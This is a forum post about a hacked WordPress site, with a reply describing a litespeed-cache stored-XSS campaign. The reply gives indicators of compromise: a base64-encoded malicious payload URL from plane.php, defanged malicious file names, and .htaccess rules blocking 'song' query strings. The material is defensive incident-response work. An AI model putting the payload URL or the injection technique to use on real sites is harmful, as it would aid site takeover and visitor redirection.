Good morning, I suddenly found administrator users on my wordpress site and a plugin called wp-cleansong that I never installed. The site redirects when I browse. How can I solve it?
i leave you details about this hack:
Vulnerable plugin: litespeed-cache (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N)
Affected Version <= 5.7 Patched Version 5.7.0.1
You can fast check at wp-content/plugins/litespeed-cache/readme.txt
Symptoms:
Creation of admin users Redirects generated by js hooked in wp_head via function clean_header() function Infected core files like wp-blog-header.php Execution:
Attackers can inject arbitrary web scripts into pages that will run when an administrator logs in for the first time in wp-admin. The plugin will in fact be created on exactly the same date and time as login as you can see from the access.log Plane.php point ot a base64 url =base64_decode("aHR0cHM6Ly9kbnMuc3RhcnRzZXJ2aWNlZm91bmRzLmNvbS9zZXJ2aWNlL2YucGhw"); point to hxxps://dns[.]startserv**founds[.]com/service/f.php (blacklisted url)
Sources :
https://www.risorsainformatica.com/rimozione-malware-sito-wordpress/
Malware removal performed on over 1500 websites, of which 30 with this specific attack.
Notes: First detected on February 27, 2024
Prevention: Update to latest version Litespeed cache plugin
HTTP(S) monitoring for /plugins/wp-cleansong/plane.php
Block using htaccess the requests to song and song1
RewriteEngine On
RewriteCond %{QUERY_STRING} song1 [NC,OR]
RewriteCond %{QUERY_STRING} song2 [NC]
RewriteRule ^ - [F]
Also you can block plane.php , wp-cleansong.php and song.php